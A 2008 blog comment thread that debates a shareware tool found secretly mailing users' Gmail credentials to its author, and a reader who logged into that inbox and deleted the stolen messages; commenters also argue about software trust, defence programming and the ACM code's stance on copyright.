@Aaron - I would think linking to the original application is exactly the right thing to do, as CH is likely to show up as the first hit in Google for the software (as of right now it's number 4.)

@Joshua others, the screenshot only shows that the most recent 1777 emails were unread - who knows how many thousands of people have tried the software. Plus, if they are being automatically forwarded they won't show up as read. I'm not sure that what Dustin did was right, but if he had to do it, he could have at least checked out the filters and saved the contact list first.

Interestingly the download and buy links on his site seem to be inactive. Also, I hope this doesn't hurt the reputation of garchiver (http://garchiver.sourceforge.net/garchiver/), the GNOME archiving utility with the almost identical name.

Alex on March 8, 2008 8:13 AM

I wouldn't worry too much about notifying the people about their username/password compromise. As you can clearly see, the emails have never been read. Only Google could read them without marking them as read, and that's kind of irrelevant, now isn't it?

Joshua on March 8, 2008 8:14 AM

A.L. Flanagan wrote:
"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did. Stopping the leak should be first priority, then catching the guy. The chances of the latter, and successfully prosecuting him/her, are unfortunately slim anyway."

Yes, but did Dustin do what's in *Dustin's* best interests? People have been prosecuted for simply reporting security issues in corporate websites, where the intent was benign, not malicious. It's gotten to the point that the best policy is to keep your mouth shut.

As Joe pointed out, Dustin has committed the following potential crimes (I am not a lawyer or police officer):
1) Accessing someone else's mail account, without permission
2) Deleting someone else's data, without permission
3) Destroying evidence

Of course, most will not argue Dustin did the wrong thing *morally*. But who knows, a judge might see it differently.

Here's a story where a university student could've been expelled for accessing unsecured data on a campus network:
http://chronicle.com/news/article/3146/university-allows-student-journalist-who-discovered-data-security-flaw-to-remain

Will on March 8, 2008 8:17 AM

It's gotten to the point that I am hesitant to run anything I don't write myself or download from a trusted source such as Microsoft or another major vendor.

The days of using stuff from TuCows or CNet have been over for quite some time for me - and then I read something like this and it confirms what were my worst fears.

Mr_Simple on March 8, 2008 8:43 AM

Stewie and the rest of you anti-defense morons need to take your liberal, kumbaya attitudes and shove them up your a$$e$. In a perfect world we could all rest easy knowing that no one would ever create weapons because they would all abide by some unwritten code of ethics. But the world is not perfect and someone somewhere is going to do the coding. And because of that, we need someone to do the coding on defense systems as well. That's why it's called "defense" and not "offense".

War sucks. And yes, innocent people get hurt. But innocent people get hurt by more than just war. If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.

Matt on March 8, 2008 8:45 AM

"If I had been one of those people in the in-box, I'd have wanted Dustin to do exactly what he did."

Thereby destroying the evidence, and stopping any chance you had of successfully...

a) suing for damages, or

b) proving that the criminal acts done in your name with your gmail account weren't actually perpetrated by you.

Much better would have been to change the password on the account (locking the real John Terry out), then report it to Google.

But hindsight is always 20-20, especially when you can be a vigilante hero.

Geri on March 8, 2008 8:45 AM

@Joshua
There is a "mark as unread" button in GMail.

Andrei on March 8, 2008 8:46 AM

Isn't it really about ethics, period, and not just "programming ethics"?

However, it seems a little silly to focus on this incident -- every time we post, the internet remembers; every time we log on, we allow (without the legal action others have mentioned) large corporations to write information to our hard drives without permission, and to "phone home", without our permission.

Steve on March 8, 2008 8:48 AM

Damn.

Aalaap Ghag on March 8, 2008 8:54 AM

The "intellectual 'property'" clauses 5 and 6 are why I flatly refuse to join the ACM. I have no difficulty giving credit for authorship - that is to say, I agree with attribution rights and think plagiarism is fraud.

However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies.

5 and 6 are irreconcilable with the others.

1. copyrights and patents actively destroy human well-being.
2. Enforcement of copyrights and patents harm others.
3. Those who enforce copyrights and patents rather than waiving them
are untrustworthy.
4. copyrights and patents discriminate against those who believe in free markets.
5. copyrights and patents are not proper property rights. In fact, they destroy physical property rights (even though you own something, you are not permitted to shape its physical form to convey certain information).

6. I have no difficulty giving credit to authors for authorship. The "proper credit" for "intellectual 'property'" is a massive "SCREW YOU" to whoever came up with the term.

7. Enforcement of patent and copyright in the technological limit (which the relevant infonazis are pursuing with digital restrictions management) requires gross violation of everyone's privacy to make sure people aren't (gasp) copying or using bits of information.

8. It's impossible to truly honour confidentiality while "respecting" copyrights and patents.

A. Programmer on March 8, 2008 8:58 AM

@paulz:
"""
Yeah, it's bad, but come on, use your common sense - there is no such thing as free software. Someone gets something out of it, it might not be money it might be data. Never use shareware - here is the answer.
"""

Yes, there is such a thing as free software - free (as in free speech) open source software. The problem is not free (as in free beer) vs commercial, but closed source vs open source. And yes, there are actually programmers that give their work away without trying to steal anything from you.

Bruno on March 8, 2008 8:59 AM

Can we now even trust the browsers?

Samrat Patil on March 8, 2008 9:06 AM
